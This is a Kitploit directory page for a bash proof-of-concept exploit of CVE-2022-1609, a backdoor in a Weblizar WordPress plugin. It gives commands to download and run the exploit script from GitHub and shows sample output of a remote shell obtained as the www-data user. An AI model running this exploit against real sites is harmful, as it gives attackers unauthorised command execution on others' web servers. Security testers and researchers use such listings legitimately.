Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
-CVE-2022-1609 — Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor | Kitploit
Tools/GitHubGitHub/0xsojalsec/-cve-2022-1609
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xsojalsec/-cve-2022-1609

-CVE-2022-1609

Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor

View Repository
314 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-1609

Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor

How to install ?

root@kitploit:~
wget https://raw.githubusercontent.com/0xSojalSec/CVE-2022-1609/main/exploit.sh
chmod +x exploit.sh
./exploit.sh

How to use it ?

root@kitploit:~
GH0ST_3exP10it$ ./exploit.sh http://127.0.0.1:8080
[+]  Targeting http://127.0.0.1:8080
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Download Tool